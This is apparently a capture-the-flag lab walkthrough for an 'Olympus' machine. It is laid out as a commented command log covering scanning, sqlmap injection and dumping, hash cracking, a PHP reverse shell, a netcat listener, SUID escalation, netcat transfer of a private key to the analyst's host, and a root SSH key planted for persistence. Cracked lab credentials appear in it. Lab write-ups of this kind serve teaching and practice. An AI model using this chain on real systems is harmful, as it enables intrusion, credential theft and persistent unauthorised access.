Olympus
Initial Scan
nmap -A $VICTIM
Scan all ports

TCP/80 - HTTP



SQLMap












Initial Shell










Netcat


Privilege Escalation


Secret Flag




# Initial scan of the lab target. -A turns on OS detection, version detection,
# script scanning and traceroute. $VICTIM must already hold the target address.
nmap -A $VICTIM


































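# Command log for the Olympus lab walkthrough, restored to one command per line.
# The page extraction had fused separate code blocks together (for example
# "$VICTIMgobuster"), so the original text was not usable as written.
#
# $VICTIM is the lab target and $KALI the analyst workstation; both are set
# outside this listing. Lines that were notes, keystrokes or prompts on the page
# are kept as comments so they are not mistaken for commands.
# The grouping comments below are descriptive and are not the page's own headings.

# --- Full port scan ---
# TCP connect scan of every port with service/version and OS detection.
nmap -sV -sT -O -p 1-65535 "$VICTIM"

# --- Web content discovery on olympus.thm ---
gobuster dir -u olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
dirb http://olympus.thm

# --- SQL injection testing with sqlmap ---
# -r replays a saved HTTP request; req.txt itself is not shown on the page.
sqlmap -r req.txt --banner
sqlmap -r req.txt --tables
sqlmap -r req.txt --dbms=mysql --dump

# --- Offline check of the dumped hashes ---
# Defensive takeaway: a hash that falls to a public wordlist such as rockyou.txt
# offers no protection once the table has leaked.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Credential note as recorded on the page (it appears twice there).
# Presumably the john result; the page does not say so explicitly.
# Username: prometheus
# Password: summertime
# Username: prometheus
# Password: summertime

# --- PHP shell preparation ---
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
# Opens the file in an editor; the edits made are not shown on the page.
subl php-reverse-shell.php

# --- Authenticated content discovery on chat.olympus.thm ---
# The cracked credential is reused here: one weak password opened a second host.
gobuster -U prometheus -P summertime dir -u chat.olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

# Clear sqlmap's cached session for the target, then dump only olympus.chats.
rm -rf /root/.sqlmap/output/olympus.thm/
sqlmap -r req.txt --dbms=mysql --dump -T chats -D olympus

# --- Listener and terminal upgrade ---
# NOTE(review): the page gives no port after -p; confirm against the original.
nc -lvnp
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Keystroke recorded on the page, not a command:
# ctrl + Z
stty raw -echo;fg

# --- User flag ---
cd /home/zeus
cat zeus.txt

# --- SUID audit ---
# The same find is what a defender runs to inventory setuid binaries; anything
# outside the distribution's known set deserves review.
find / -perm -u=s -type f 2> /dev/null
ls -lah /usr/bin/cputils
# The interaction with cputils is not shown on the page; the steps that follow
# move a file named id_rsa off the host.
/usr/bin/cputils

# --- Key transfer ---
# Receiving side:
nc -l -p 1234 > id_rsa
# Sending side:
cd /tmp
nc -w 3 $KALI 1234 < id_rsa

# --- Key passphrase check ---
# Defensive takeaway: a wordlist-guessable passphrase does not protect a private
# key once the key file can be read.
chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt

ssh -i id_rsa zeus@$VICTIM
# Prompt response recorded on the page (presumably the key passphrase):
# Password: snowflake

# --- Hidden PHP file under the web root ---
cd /var/www/html/0aB44fdS3eDnLkpsz3deGv8TttR4sc/
cat VIGQFQFMYOST.php
# NOTE(review): the page runs the next line straight on from the cat above, and
# $suid_bd is never set in this listing. It may be text quoted from the PHP file
# rather than a typed command; confirm against the original page.
/lib/defended/libc.so.99;uname -a; w; $suid_bd
whoami

# --- SSH key added for root ---
# Detection point: a new entry in /root/.ssh/authorized_keys is a persistence
# artifact; file-integrity monitoring on that path would record it.
ssh-keygen -t rsa
cat /root/epic.pub
vi /root/.ssh/authorized_keys
# The page has the literal "root@VICTIM"; written as the variable here to match
# the earlier "zeus@$VICTIM".
ssh -i epic root@"$VICTIM"

# --- Final flag search ---
grep -r "flag{" /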